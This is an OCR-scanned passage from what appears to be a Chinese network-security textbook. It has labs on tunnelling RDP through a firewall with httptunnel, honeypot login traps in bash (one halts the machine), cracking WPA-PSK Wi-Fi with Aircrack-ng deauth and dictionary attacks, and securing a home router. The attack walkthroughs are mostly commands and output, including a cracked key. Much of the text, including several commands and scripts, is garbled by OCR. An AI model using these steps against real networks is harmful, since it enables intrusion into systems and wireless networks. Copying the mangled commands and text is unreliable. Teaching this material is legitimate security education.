3389 端口 开放 ,入侵 者 想 连 接 该 计算 机 的 3389 端口 ,该 怎么 办 呢 ? 此 时 可 以 使 用 
httptunnel 技术 。 

httptunnel 技术 也 称 为 隧道 技术 ,是 一 种 绕 过 防火 墙 端 口 屏蔽 的 通信 方式 。 

httptunnel 原理 : 在 防火 墙 两 边 的 主机 上 都 有 一 个 转换 程序 ,将 原来 需要 发 送 或 接受 
的 数据 包 封 装 成 HTTP 请 求 的 格式 骗 过 防火 墙 , 当 被 封装 的 数据 包 穿 过 防火 墙 到 达 对 方 
时 ,再 由 转换 程序 将 数据 包 还 原 , 然 后 将 还 原 的 数据 包 交 给 相应 的 服务 程序 。 由 此 可 知 , 攻 
击 者 可 以 利用 这 种 技术 实现 远程 控制 。 

如 图 5-136 所 示 ,X 主机 在 防火 墙 的 外 面 ,没有 做 任何 限制 。Y 主机 在 防火 墙 内 部 , 受 
到 防火 墙 保护 ,防火 墙 配 置 的 访问 控制 原则 是 只 允许 80 端口 的 数据 包 进 出 ,但 主机 开放 了 

209 


Windows Linux Windows 


入 侵 者 (X) 网 关 防火 墙 被 入 侵 者 (Y) 
5-136 httptunnel 技术 应 用 示意 图 
3389 端口 (远程 终端 服务 ) 。 现 在 假设 需要 从 X 系统 远程 登录 到 Y 系统 上 去 ,思路 如 下 。 

在 X 机 器 上 运行 httptunnel 客户 端 , 让 它 侦 听 本 机 的 一 个 不 被 使 用 的 任意 指定 端口 
(最 好 是 1024 以 上 65535 以 下 ) ,如 8888 端口 。 同 时 将 来 自 8888 端口 上 的 数据 包 发 送 给 Y 
机 的 80 端口 ,因为 是 80 端口 ,防火 墙 是 允许 通过 的 。 数 据 包 到 达 Y 机 后 ,由 运行 在 Y 机 的 
httptunnel 服务 端 (在 80 端口 监听 ) 接 收 并 且 进 行 处 理 , 然 后 将 数据 包 交 给 在 3389 端口 监 
听 的 服务 程序 。 当 Y 机 需要 将 数据 包 发 送 给 X 机 时 ,将 从 80 端口 回 送 ,同样 可 以 顺利 通过 
防火 墙 。 

httptunnel 的 官方 网 站 是 http://www. http-tunnel. com。 


2. 实例 : 通过 httptunnel 技术 进行 入 侵 
和 cygwinl.dll 


实验 环境 如 图 5-137 Bron 。 
e 192.168.10.5 


安装 hts.exe 
和 cygwin1.dll 


192.168.10.1 


Windows 2003 Windows XP 
入 侵 者 


图 5-137 实验 环境 


第 1 P.: 下 载 并 安装 httptunnel 程序 。 在 http://www. neophob. com/files/ 
httptunnel-3. 3w32. zip 上 下 载 httptunnel 程序 ,其 中 包含 3 个 文件 : htc. exeChttp tunnel 
client, 也 就 是 客户 端 ) .hts. exeChttp tunnel server, 也 就 是 服务 器 端 ) 和 cygwinl. dll( 一 个 
动态 链接 库 ) hts. exe 是 服务 器 端 ,安装 被 入 侵 计算 机 中 ,htc. exe 是 客户 端 ,安装 在 入 侵 
者 计算 机 中 。 

第 2 步 : 启动 服务 器 端 程序 。 

将 hts. exe 复制 到 C:\Documents and Settings\ Administrator 目录 下 面 。 

将 cygwinl. dll 复制 到 C:\Windows\system32 目录 下 面 。 

如 果 本 台 计 算 机 的 IIS 已 经 启动 , 则 先 将 其 关闭 。 

如 图 5-138 所 示 ,执行 hts -F localhost:3389 80 命令 ,该 命令 的 含义 是 本 机 3389 端口 
发 出 去 的 数据 全 部 通过 80 端口 中 转 一 下 ,80 为 hts 监听 的 端口 ,3389 是 入 侵 者 要 连接 的 端 
口 。 然 后 执行 netstat -an 命令 ,发 现 80 端口 已 经 处 于 监听 状态 。 

第 3 步 : 执行 客户 端 程序 。 入 侵 者 在 自己 的 计算 机 中 执行 hte -F 6789 192. 168. 10.1: 
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80, 如 图 5-139 所 示 。 其 中 htc 是 客户 端 程序 ,参数 -F 表示 将 来 自 本 机 6789 端口 的 数据 全 
部 转发 到 192. 168. 10. 1:80, 这 个 端口 (6789) 可 以 随便 选 , 只 要 本 机 目前 没有 使 用 即 可 。 然 
后 执行 netstat -an 命令 ,发现 6789 端口 已 经 处 于 监听 状态 。 


ments and Settings Administrator 
C:\Documents and Settings Administrator 
Active Connection 


Proto Local fiddre Po fiddre 

TCP 8.0.0. -9.8.8:8 , 

TCP [RUN -0.0.0:0 LISTENI 
TCP ð. :8 LISTENI 
ICP B. -B-B:B LISTENI 
TCP ð. 9 :8 LISTENING 
TCP ð. : :0 LISTENING 
ICP -0.9. 5 .8. :8 LISTENING 


TCP 2 :0 TENING 
ICP ^ 


TENING 
TENING 
STENING 
TENING 
TENING 
TENING 
TENING 
TENING 


图 5-138 启动 服务 器 端 程序 


osoft Window: RA 5.1.2600] 
117 1985-2081 Microsoft Corp. 


:Documents and Settings\hdministrator>htc -F 6789 192.168-19-1:89 


:\Documents and Settings\Adninistrator 


图 5-139 ”执行 客户 端 程序 


注意 : 该 CMD 窗口 在 后 丛 过 程 中 不 要 关闭 。 

第 4 步 : 打开 “远程 桌面 连接 ”对 话 框 。 入 侵 者 在 自己 的 计算 机 中 , 单 击 “ 开 始 ”>“ 运 
行 ” 命 令 ,输入 mstsc 命令 ,打开 “远程 桌面 连接 ”对 话 框 ,如 图 5-140 所 示 , 输 入 127. 0.0. 1: 
6789, 单 击 “ 连 接 ” 按 钮 .如 果 不 出 意外 ,将 出 现 如 图 5-141 所 示 的 登录 窗口 ,此 时 表明 成 功 地 
穿越 了 防火 墙 。 

3. httptunnel 带 来 的 安全 问题 

在 前 面 的 实例 中 ,通过 httptunnel 技术 成 功 和 人 侵 了 一 台 计 算 机 (通过 80 端口 ) ,这 是 一 
个 值得 思考 的 网 络 安全 问题 ,因为 从 中 可 以 看 到 要 想 保障 网 络 安全 ,仅仅 依靠 某 ( 几 ) 种 技术 
手段 是 不 可 靠 的 ,所 以 网 络 管理 员 不 要 过 分 依赖 防火 墙 。 

对 于 利用 httptunnel 技术 进行 的 入 侵 . 可 以 使 用 应 用 层 的 数据 包 检 测 技 术 来 发 现 ,因为 
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HEMO: [127.0.0.1:6789 


[EOD 


图 5-140 “远程 桌面 连接 ”对 话 框 
Æ 127.0.0.1:6789 - T1] 
登录 到 Windows 


Windows Server 2003 
W. Enterprise Edition 


RPS0) fidministrator 
m: [ 


wa | emo») 


图 5-141 远程 系统 登录 对 话 框 


在 正常 的 HTTP 请 求 中 必定 包含 GET 或 POST 等 行为 .如 果 来 自 一 个 连接 的 HTTP 请 求 
总 是 没有 GET 或 POST, 那 么 这 个 连接 一 定 有 问题 ,因此 终止 该 连接 。 现 在 市 面 上 已 经 
出 现 了 能 够 查 出 隐藏 在 HTTP 中 tunnel 的 IDS, 


516 实例 : ER 


计算 机 网 络 安全 技术 的 核心 问题 ,是 对 计算 机 和 网 络 系统 进行 有 效 的 防护 。 网 络 安全 
防护 涉及 面 很 广 ,从 技术 层面 上 讲 , 主 要 包括 数据 加 密 技术 、 认 证 技术 、 防 火 墙 技术 、 入 侵 检 
测 技 术 、 病 毒 防护 技术 等 。 在 这 些 技 术 中 ,多 数 技术 都 是 在 攻击 者 对 网 络 进行 攻击 时 进行 的 
被 动 防护 。 然 而 , 蜜 钢 (Honeypot) 技 术 可 以 采取 主动 方式 。 蜜 钢 技 术 诱 导 黑 客 误 入 歧途 ， 
消耗 他 们 的 精力 ,为 加 强 防范 赢得 时 间 。 

1. ERBES 

美国 的 L. Spizner J& — AEA ERREK fü E SEED IE X0. SEMEJE— RU E 
的 价值 是 被 攻击 或 攻陷 。 这 就 意味 着 蜜 饶 是 用 来 被 探测 Bh Hc E doce B e a II «LEAN 
会 修补 任何 东西 ,这样 就 为 使 用 者 提供 了 额外 的 \ 有 价值 的 信息 。 蜜 饶 不 会 直接 提高 计算 机 
网 络 安全 ,但 是 它 却 是 其 他 安全 策略 不 可 替代 的 一 种 主动 防御 技术 。 由 于 蜜 饶 并 没有 向 外 
界 提 供 真 正 有 价值 的 服务 ,因此 所 有 对 蜜 饶 的 访问 都 被 视 为 可 疑 的 。 蜜 饶 拖 延 攻击 者 对 真 
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正 目标 的 攻击 ,让 攻击 者 在 蜜 缸 上 浪费 时 间 。 

蜜 饶 就 是 一 台 不 作 任何 安全 防范 措施 .并且 连 接 互 联网 的 计算 机 。 但 是 蜜 饶 与 一 般 的 
计算 机 不 同 , 它 存在 多 种 漏洞 ,并 且 管 理 员 清 楚 这 些 漏 洞 ,内 部 运行 各 种 数据 记录 程序 ,会 记 
录入 侵 者 的 所 有 操作 和 行为 ,这 也 是 蜜 饶 系 统 最 为 重要 的 功能 。 

无 论 如 何 建立 和 使 用 蜜 饶 , 只 有 受到 攻击 时 , 它 的 作用 才能 发 挥 出 来 。 为 了 吸引 攻击 
者 ,通常 在 蜜 缸 系统 中 故意 留 下 一 些 安全 后 门 ,或 者 放置 一 些 网 络 攻击 者 希望 得 到 的 虚假 敏 
感 信 息 ,吸引 攻击 者 上 钩 。 对 攻击 者 的 行为 进行 记录 ,管理 员 通过 研究 和 分 析 这 些 记录 ,能 
够 得 知 攻击 者 采用 的 攻击 工具 、 攻 击 手段 、 攻 击 目的 和 攻击 水 平等 信息 。 同 时 ,这 些 信 息 将 
会 成 为 对 攻击 者 进行 起 诉 的 证 据 。 

2. 蜜 缸 的 分 类 

根据 设计 的 最 终 目的 不 同 , 可 以 将 蜜 饶 分 为 产品 型 蜜 缸 、 研 究 型 蜜 饶 。 

CD 产品 型 蜜 饶 一 般 运 用 于 商业 组 织 的 网 络 中 。 

(2) 研究 型 蜜 钠 专 门 以 研究 和 获取 攻击 信息 为 目的 而 设计 。 

3. 一 个 简单 密 缸 的 例子 

操作 系统 为 RHEL/CentOS/Fedora。 

黑客 入 侵 Linux 系统 一 般 有 两 种 方法 。 第 一 ,猜测 root 口令 ,一 旦 获得 root 口令 ,就 会 
以 root 身份 登录 。 第 二 , 先 以 普通 用 户 身 份 登录 ,然后 用 su 命令 转换 成 root; 

(1) 设置 陷阱 ,防止 黑客 以 root 身份 登录 

在 /root/. bash. profile 文件 后 面 追加 如 下 一 段 程序 : 

* root .profile 


clear 
echo "Login incorrect" 


read p 
if [ "$p" = "123456" ]; then 
clear 
else 
exit 
fi 
(2) 设置 陷阱 ,防止 黑客 用 su 命令 转换 成 root 
1E / etc/ profile 文件 后 面 追加 如 下 一 条 命令 : 


alias su= 'su ztguang' 


(3) 设置 陷阱 ,中 止 黑客 的 root 身份 

如 果 黑 客 已 经 成 功 以 root 身份 登录 ,就 要 启动 登录 成 功 的 陷阱 。 一 旦 root 登录 ,就 启 
动 一 个 计时 器 ,正常 的 root 登录 能 够 停止 计时 ,而 非法 入 侵 者 因 不 知道 何 处 有 计时 器 ,就 无 
法 停止 计时 。 等 计时 到 时 ,就 触发 相应 的 操作 (如 关机 等 ) 。 

陷阱 程序 /root/nonhacker. sh 内 容 如 下 : 

#! /bin/sh 

tt-0 
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while [ "$ tt" —1e 120 ]; do 
sleep 1 
tt- $((Stt*1)) 

done 


halt * 2 分 钟 后 关机 
在 /root/. bashrc 文件 后 面 追加 如 下 一 条 命令 : 
. nonhacker. sh & 


正常 root 用 户 登录 后 ,可 以 执行 jobs 命令 ,然后 执行 kill %n 命令 终止 陷阱 程序 。 


517 实例 : Kai Linx 中 使 用 Araackmg 
破解 W-6 密码 


Aircrack-ng 是 一 款 用 于 破解 无 线 802. 11WEP 及 WPA-PSK 加 密 的 工具 。 对 于 无 线 
黑客 而 言 , Aircrack-ng 是 一 款 必 不 可 缺少 的 无 线 攻 击 工 具 。 对 于 无 线 安全 人 员 而 言 ， 
Aircrack-ng 是 一 款 必 备 的 无 线 安全 检测 工具 , 它 可 以 帮助 管理 员 进 行 无 线 网 络 密码 的 脆弱 
性 检查 ,了 解 无 线 网 络 信号 的 分 布 情况 。Aircrack-ng 是 一 个 包含 了 多 款 工 具 的 无 线 攻 击 审 
计 套 装 ,具体 组 件 见 表 5-19 。 

表 5-19 Aircrack-ng 组 件 列表 


组 件 名称 描 述 

主要 用 于 WEP 及 WPA-PSK 密码 的 恢复 ,只 要 airodump-ng 收集 到 足够 数量 的 数据 
包 .aircrack-ng 就 可 以 自动 检测 数据 包 并 判断 是 否 可 以 破解 

airmon-ng 用 于 改变 无 线 网 卡 工作 模式 ,以 便 其 他 工具 的 顺利 使 用 

airodump-ng | 用 于 捕获 802. 11 数据 报 文 , 以 便于 aircrack-ng 破解 

在 进行 WEP 及 WPA-PSK 密码 恢复 时 ,可 以 根据 需要 创建 特殊 的 无 线 网 络 数据 报 文 及 
流量 

airserv-ng 可 以 将 无 线 网 卡 连接 至 某 一 特定 端口 ,为 攻击 时 灵活 调用 做 准备 

airolib-ng 进行 WPA Rainbow Table 攻击 时 使 用 ,用 于 建立 特定 数据 库 文件 

airdecap-ng 用 于 解 开 处 于 加 密 状态 的 数据 包 

tools 其 他 用 于 辅助 的 工具 ,如 airdriver-ng、packetforge-ng 等 


aircrack-ng 


aireplay-ng 


实验 环境 如 图 5-142 所 示 。 使 用 Aircrack-ng 破解 WPA-PSK 加 密 无 线 网 络 的 步骤 
如 下 。 

第 1 步 : 开启 终端 1, 载 和 并 激活 无 线 网 卡 至 监听 模式 。 开 启 终端 1, 依 次 执行 如 下 命 
令 , 如 图 5-143 所 示 。 

# ifconfig -a 

# airmon- ng start wlan0 // 激 活 网 卡 到 monitor 模式 

如 图 5-143 所 示 ,可 以 看 到 无 线 网 卡 的 芯片 及 驱动 类 型 ,芯片 类 型 是 RTL8723BE, 驱 动 
是 rt18723be. monitor mode vif enabled on wlan0mon 表示 已 经 启动 监听 模式 ,监听 模式 下 
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适配器 名 称 变更 为 wlan0mon。 


B 
E 
被 欺骗 者 
192.168.0.101 攻击 者 : 192.168.0.100 


Android 网 关 : 192.168.0.1 Kali Linux 2.0 
图 5-142 实验 环境 


root@debian: ~ eoo 


Iroot@iebian: ~# airmon-ng start wlanü 

Found 5 processes that toata tause trouble. 

If airodump-ng, aireplay-ng or airtun-ng stops working after 
la short period of time, you may want to kill (some of) then! 


PID Name 

757 NetworkManager 
869 dhclient 

1046 avahi- daemon 
1047 avahi- daemon 
1056 wpa supplicant 


PHY Interface Driver Chipset 


phyo — wlano rt18723be Realtek Semiconductor Co., Ltd. RTLB723BE PCIe Wireless Network Adapter| 
Parter to set wtantson up using ip 


(mac80211 monitor mode vif enabled for [phy0] wLan0 on [phyO]wlanmon) 
(mac80211 station mode vif disabled for [phyO]wiano) —— — — — — 


|rootGdebian: -# airodumj wianümon 
ILoct U SIOCSIFFLAGS] Tallok Üperation not possible due to RF-kill 


IrootGtebian: -# J 


图 5-143 ”执行 airmon-ng 命令 
执行 airodump-ng wlan0mon 命令 ,出 现 错误 信息 如 下 : 
ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF — kill 
执行 如 下 命令 解决 该 问题 。 


root@debian: ~ # rfkill list 

0: tpacpi_bluetooth_sw: Bluetooth 
Soft blocked: no 

Hard blocked: no 

1: phy0: Wireless LAN 

Soft blocked: yes 

Hard blocked: no 

2: hci0: Bluetooth 

Soft blocked: no 

Hard blocked: no 

root@debian:~ # rfkill unblock 1 


执行 如 下 命令 ,如 图 5-144 所 示 。 
# airodump- ng - w name wlanOmon —- essid 606 - ztg 


第 2 步 : 开启 终端 2, 探 测 无 线 网 络 , 抓 取 无 线 数据 包 。 在 激活 无 线 网 卡 后 ,就 可 以 开启 无 
线 数据 包 抓 包工 具 了 ,使 用 Aircrack-ng 套装 里 的 airodump-ng 工具 来 实现 。 开 启 终端 1, 执 
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root@debian: ~ eoo 
CH 2][ Elapsed: 18 s ][ 2015-09-07 10:59 
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 
C8: 3A: 35: 14: AB: 18 0 39 16 7 10 54e WPA CCMP PSK $606-ztg 
BSSID STATION PWR Rate Lost Frames Probe 
C8: 3A: 35: 14: AB: 18 C8: A -32 te- 1e 3 16 
(not associat 00: -43 0-1 7 6 Apple Setup 
(not associated) -43 0-1 0 5 
(not associated) 44: 63 0-1 5 4 
(not associated) DO: -69 0-1 0 1 
(not associated) 74: -71 0-1 0 2 
(not associated) D2:7, 74 0-6 0 1 DIRECT. 


图 5-144 ”执行 airodump-ng 命令 
行 如 下 命令 ,如 图 5-145 Bros ,表示 无 线 数 据 包 捕 获 开 始 , 不 要 关闭 该 窗口 。 另 外 打开 一 个 
Shell。 进 行 后 面 的 内 容 。 
# airodump- ng -c 10 --bssid C8:3A:35:14:AB:18 -w log wlan0mon 
选项 解释 如 下 。 


-c: 设置 AP(AccessPoint) 的 工作 频道 。 
-w: 后 跟 要 保存 的 文件 名 ,生成 的 文件 不 是 log. cap ,而 是 log-01. cap. 


root@debian: ~ x 


CH 10 ][ Elapsed: 1 min ][ 2015-09-07 11:02 ][ fixed channel wlanOmon: 5 


BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 

C8: 3A: 35: 14: AB: 18 0 80 289 315 0 10 54e WPA CCMP PSK 606-ztg | 
BSSID STATION PWR Rate Lost Frames Probe 

C8: 3A: 35: 14: AB: 18 C8: AA: 21: DF: 0D: 6D -19 1e 2 0 319 


5-145 ”探测 无 线 网 络 , 抓 取 无 线 数据 包 


第 3 步 : 开启 终端 3, 使 用 DeAuth 攻击 加 速 破 解 过 程 。 为 了 获得 破解 所 需 的 
WPA-PSK 握手 验证 的 完整 数据 包 ,攻击 者 发 送 一 种 称 为 DeAuth 的 数据 包 ,将 已 连接 无 线 
路 由 器 的 合法 客户 端 强制 断 开 ,然后 客户 端 会 自动 重新 连接 无 线路 由 器 ,此 时 攻击 者 就 有 机 
会 捕获 包含 WPA-PSK 握手 验证 的 完整 数据 包 。 

开启 终端 3, 执 行 如 下 命令 ,如 图 5-146 所 示 。 


# aireplay- ng -01 -a CB:3A:35:14:AB:18 -c C8:AA:21:DF:0D:6D wlanOmon 


选项 解释 如 下 。 

-0: 采用 DeAuth 攻击 模式 ,后 面 跟 上 攻击 次 数 。 

-a: 后 跟 AP(AccessPoint) 的 MAC 地 址 。 

-c: 后 跟 被 欺骗 者 的 MAC 地 址 。 

此 时 回 到 终端 1 查看 ,如 图 5-147 所 示 , 可 以 看 到 右上 角 出 现 了 WPA handshake, 这 表 
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root@debian: ~ eoo 
root@debian: - x root@debian: - x root@debian: - x 
root@iebian: -# aireplay-ng -0 1 -a C8: 3A: 35: 14: AB: 18 -c C8: AA: 21: DF: 0D: 6D wlanonon 
11:04:48 Waiting for beacon frame (BSSID: C8: 3A: 35: 14: AB: 18) on channel 10 
11:04:49 Sending 64 directed DeAuth. STMAC: [C8: AA: 21: DF: 0D: 6D]. [11|13 ACKs] 
rootGdebian: -# B = 


图 5-146 使 用 DeAuth 攻击 加 速 破解 过 程 


CH 1][ Elapsed: 5 mins ][ 2015-09-07 11:06 ][ WPA handshake: C8: 3A: 35: 14: AB: 18 
BSSID PWR Beacons #Data, Ws CH MB ENC CIPHER AUTH ESSID 


C8: 3A: 35: 14: AB: 18 0 1446 371 0 10 54e WPA CCMP PSK 606-ztg 


图 5-147 出 现 WPA handshake 


示 捕 获 到 了 包含 WPA-PSK 密码 的 4 次 握手 数据 包 。 如 果 没 有 看 到 WPA handshake, 可 以 
增加 DeAuth 的 发 送 数量 ,再 次 进行 攻击 。 

第 4 步 : 开启 终端 4, 破 解 WPA-PSK。 在 成 功 获取 到 无 线 WPA-PSK 验证 数据 报 文 
后 ,就 可 以 开始 破解 了 。 

开启 终端 4, 执行 如 下 命令 ,如 图 5-148 所 示 。 可 以 看 到 ,破解 速度 达到 近 1900k/s, 即 
每 秒 尝试 约 2000 个 密码 。 几 秒 钟 便 成 功 破解 出 密码 。 破 解 WPA-PSK 对 硬件 要 求 及 字典 
要 求 很 高 ,只 有 多 准备 一 些 常用 的 字典 , 才 会 增 大 破解 的 成 功率 。 


# aircrack- ng - w /root/ 桌 面 /aircrack - ng - dictionary/all.lst log * .cap 


rootGHebian: -# aircrack-ng -w / root/ J ii / aircrack- 
[Opening log-01.cap 
Read 35551 packets. 

# BSSID ESSID Encryption 

1 8:34:35: 14: AB: 18 606- ztg WPA (1 handshake) 
[Choosing first network as target. 


Opening log-01. cap 
Reading packets, please wait... 

Aircrack-ng 1.2 rc2 
00:00:02] 3944 keys tested (1865. 12 k/s) 


KEY FOUND! [ bupt135246 ] 


Master Key : 02 3A 51 A7 D7 40 3D BE 97 53 4E 73 98 21 87 70 
2C F3 1A 76 BF F1 5D 3E A0 4A CE FF FE 14 DE 2A 
Transient Key : 24 3D D6 61 19 97 20 29 00 AF A3 24 FA 09 SS 90 
22 F3 94 57 C2 9D 46 8B 91 E3 F7 A6 8D 24 E8 B7 


58 51 6C 3A 1C 72 5C 02 20 FD E4 49 9E A3 59 FO 
36 B4 35 69 1D FS 60 A6 41 67 7C C3 47 OF 16 34 


EAPOL HMAC — : 11 B7 61 74 ES BE 27 6A FO 47 0C 5B 7B C7 20 FD 
Iroot&iebian: -# 图 


图 5-148 ”获得 密码 
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选项 解释 如 下 。 
-w: 后 跟 预 先 制作 的 字典 。 
提示 : 字典 的 下 载 地 址 列表 如 下 : 


http://www. aircrack - ng. org/doku. php?id = faq# where can i find good wordlists 


本 实验 使 用 的 all. 1st, 其 下 载 地 址 为 ftp: //ftp. openwall. com/pub/ wordlists/ 。 
对 于 启用 WPA2-PSK 加 密 的 无 线 网 络 , 其 攻击 和 破解 步 又 是 完全 一 样 的 。 


518 实例 : 无 线 网 络 安全 配置 


1. 一 个 简单 的 案例 

某 人 在 自己 家 的 客厅 里 用 笔记 本 无 线 上 网 时 ,发 现 速度 比 在 书房 (AP 放 在 书房 ) 的 速 
度 要 快 ,这 是 为 什么 呢 ? 

原来 此 人 在 客厅 无 线 上 网 时 是 通过 邻居 家 的 AP, 并 且 邻 居家 的 无 线 网 络 没有 采取 加 
密 手 段 ,不 过 这 个 例子 纯 属 巧合 。 

2. 实例 : 无 线 网 络 安全 配置 

实验 环境 如 图 5-149 Bro 。 

第 1 步 : 在 桌面 上 右 击 “网 上 邻居 ”, 选择 “ 属 


性 "命令 ,打开 “网 络 连接 "窗口 。 然 后 右 击 “本 地 连 C) 

接 ”, 选 择 “ 属 性 "命令 ,打开 “本 地 连接 属性 ”对 话 框 。 

再 在 “常规 ”选项 卡 里 双击 “Internet 协议 (TCP/ TP-LINK 路 由 器 Window XP 
IP)”, 弹 出 “Internet 协议 (TCP/IP) 属 性 "对话 框 ， 10216812 192.168.122 
设置 静态 IP 地 址 为 192. 168. 1.22, 图 5-149 ”实验 环境 


第 2 步 : 打开 IE 浏览 器 ,在 地 址 栏 中 输入 192. 

168.1.1, 按 Enter 键 。 在 弹出 的 对 话 框 中 输入 用 户 名 和 密码 ,默认 的 用 户 名 和 密码 都 是 
admin。 单 击 “ 确 定 ” 按 钮 ,出 现 路 由 器 的 设置 界面 ,选择 “设置 向 导 ”, 单 击 “ 下 一 步 ” 按 钮 ,出 
现 如 图 5-150 所 示 的 界面 。 

第 3 步 : 在 图 5-150 中 选中 “PPPoE(ADSL 虚拟 拨号 )”, 读 者 可 以 根据 自己 的 网 络 情 
况 ,在 三 个 选项 中 选择 其 一 。 单 击 “ 下 一 步 ” 按 钮 ,出现 如 图 5-151 所 示 的 界面 ,输入 ADSL 
上 网 账号 和 和 密码 (安装 宽带 时 ,工作 人 员 给 的 账号 和 密码 )。 单 击 “ 下 一 步 ” 按 钮 ,出 现 如 
图 5-152 所 示 的 界面 。 

第 4 步 : 在 图 5-152 中 更 改 SSID 号 为 ZTG-WLAN。 在 模式 栏 选择 自己 的 无 线 网 卡 模 
式 ( 如 802. 11b,802. 11g 等 ,根据 自己 的 情况 而 定 )。 现 在 的 路 由 器 兼容 802. 11b、802. 11g. 
单 击 “ 下 一 步 ” 按 钮 ,出 现 如 图 5-150 所 示 的 界面 。 

注意 : 如 果 自 己 的 网 卡 是 802. 11g, 而 路 由 器 设置 成 802. 11b, 则 无 线 连接 会 失败 。 

第 5 步 : 在 图 5-153 中 设置 PSK 密码 。 单 击 “ 下 一 步 ” 按 钮 ,完成 无 线路 由 器 的 初始 
配置 。 


218 


第 5 章 VNMUPUNSCCEUN] 


E TP-LINK — Microsoft Internet Explorer 
XPD 编辑 EE) EE) BEW IRV R00 


Oa- O- 93id € v» krkom g 


E] http://192. 163. 1. 1/ 


本 向 导 提供 三 种 最 常见 的 上 网 方式 供 选 择 。 若 为 其 它 上 网 方式 ,请 点 击 左 侧 “网 
咯 枯 数 ” 中 “WAN 口 设置 ”进行 设置 。 


O PPPoE C ADSLIÉNIRRS 
ORSI CUCKFIRER , BEDA FERIS IROR IPHNE ) 
人 〇 静态 IP( 以 太 网 宽带 ,网 络 服务 商 提供 固定 I? 地 址 ) 


LE] 


@ Internet 


请 在 下 框 中 填 入 网 络 服务 商 提供 的 ADSL 上 网 账号 及 口令 ， 如 考据 请 咨询 网 络 
man. 


上 网 账号 : 
上 网 口令 : 


图 5-151 输入 ADSL 上 网 账号 和 密码 


本 向 导 页 面 设置 路 由 器 无 线 网 络 的 基本 参数 . 


无 线 状态 : FB vj 
SSID: ZTG-WLAN 
信道 : BER wi 


模式 : |5amps 602.119 加 


图 5-152 更改 SSID 号 
下 面 的 步骤 是 无 线路 由 器 的 安全 设置 。 
第 6 步 : 在 图 5-154 中 选择 “网 络 参 数 ”>“MAC 地 址 克隆 ”, 在 右边 单 击 “ 克 隆 MAC 地 


址 ”, 然 后 单 击 “ 保 存 ” 按 钮 。 这 样 只 有 通过 自己 的 计算 机 对 无 线路 由 器 进行 管理 ,确保 了 无 
线路 由 器 的 安全 。 


第 7 步 : 在 图 5-155 中 选择 “无 线 参数 ”~ 基本 设置 ,在 右边 取消 选中 “允许 SSID J^ 
播 ”, 其 他 设置 如 图 所 示 , 然 后 单 击 “ 保 存 ” 按 钮 。 

第 8 步 : 在 图 5-156 中 选择 “DHCP 服务 器 *>“DHCP 服务 ”。 如 果 局 域 网 较 小 ,建议 
关闭 DHCP 服务 ,给 每 台 计算 机 设置 静态 IP 地 址 。 如 果 局 域 网 规模 较 大 ,可 以 启动 DHCP 
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本 向导 页 面 设置 路 由 器 无 线 安 全 。 为 保障 网 络 安全 ,强烈 推荐 开局 无 贱 安 全 ,并 使 用 
WPA-PSK/WPA2-PSK AES 加 密 方 式 。 


O 不 开 忆 无 如 安全 


O 开局 无 线 安全 
PEB: cag 


注意 : 密码 长 度 最 短 为 8 个 字符 ， 最 长 为 63 个 宇 符 。 


图 5-153 设置 PSK 密码 


本 页 设置 路 由 器 对 广域网 的 MAC 地 址 。 


MAC 地 址 : De-5D-4C-37-DC-FB 
当前 管理 FC 的 RAC 地 址 : 


注意 : 只 有 局 域 网 中 的 计算 机 能 使 用 “克隆 ”功能 。 
[Rx] [835] 
图 5-154 MAC 地 址 克隆 


无 贱 同 络 基本 设置 
本 页 面 设置 路 由 器 无 线 网 络 的 基本 参数 和 安全 认证 选项 。 


ssme : ZTG-YLAN 
频段 : [12-7 m| 
模式 : SaMbps (802.116) M 


Hebe 
O stérssror à 


O 开局 Briaee 功 能 


开局 安全 设置 


RRN: 
安全 选项 : 自动 过 每 v 
加 密 方法 : [As * 
IKE: 是 短 为 8 个 字符 ， 最 长 为 63 个 字符 


Eg 
姐 帘 钥 更 新 半期 : (86400 (P fh, 最 小 值 为 30, 不 更 新 刚 为 0| 


E 
图 5-155 基本 设置 


服务 ,不 过 一 定 要 安全 设置 无 线路 由 器 。 

第 9 步 : 在 图 5-157 中 选择 “安全 设置 >“ 防火 墙 设置 ”, 选 中 “开启 防火 墙 ” 开 启 IP 地 
址 过 滤 ”“* 开 启 域名 过 滤 ”“ 开 启 MAC 地 址 过 滤 ” 等 选项 ,读者 可 以 根据 自己 网 络 的 具体 情况 
进行 选择 ,然后 单 击 “ 保 存 ” 按 钮 。 

第 10 步 : 在 图 5-158 中 选择 “安全 设置 ”>“IP 地 址 过 滤 ”, 单 击 “ 添 加 新 条 目 ” 按 钮 , 添 
加 过 滤 规 则 。 
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DHCP 服 务 
本 系统 内 建 DHCF 服 务 器 ， 它 能 自动 莹 您 配置 局 域 网 中 各 计算 机 的 TCPVIF 协 
议 。 
THCP 服 务 器 : 〇 不 启用 加 局 用 
地 址 池 开 始 地 址 : — [192. 168. 1. 100 
地 址 池 结 束 地 址 : [1921681199 
* 客户 端 列表 
- 静态 地 址 分 配 地 址 租 期 : 120 ] 39$ C 1 一 2860 分 钟 ， 缺 省 为 120 分 钟 ? 
网 关 : 0.0.0.0 i 
Bota: 【可 选 ? 
主 DRS 服 务 器 : 0.0.0.0 TA) 
备用 DNS 服务 器 : /0. 0. 0.0 Cani» 
保存 ] [ 顶 助 


Æ 5-156 DHCP 服务 


防火 墙 设置 
本 页 对 防火 墙 的 各 个 过 湖 功 能 的 开局 与 关闭 进行 设置 。 只 有 防火 墙 的 总 开关 是 开局 的 时 候 ， 后 款 的 
IT? 地 址 过 源 ”、“ 域 名 过 源 ”、 “MAC 地 址 过 源 ”、“ 高 媚 安 全 设置 ” Tape. 反之， 则 
失效 。 


回 开启 防火 墙 5 防火 雯 的 总 开关 ) 
回 开局 IF 地 址 过 源 
缺 省 过 小 规则 


〇 ” 几 是 不 符合 已 设 IF 地 址 过 涛 规则 的 数据 包 ， 世 许 通过 本 路 由 器 
O “ 几 是 不 符合 已 设 IF 地 址 过 洲 规 则 的 数据 包 ， 林 止 通过 本 路 由 器 


回 开启 域名 过 涛 
回 开局 Ac 地 址 过 尖 
BANERA 


O DIFERE PE BAAM Internet 
O SubCmachkt vie CL RIaACHASI UT Internet, GU IC RatCHELUTETInternet 


区 到 F+ 


图 5-157 防火 墙 的 设置 


ET 


以 下 列表 为 已 设 的 TP 地 址 过 沥 列表 。 悠 可 以 利用 多 忆 一 一 “添加 亲 条目” 来 增加 新 的 过 送 规 则 ; MEN “A 
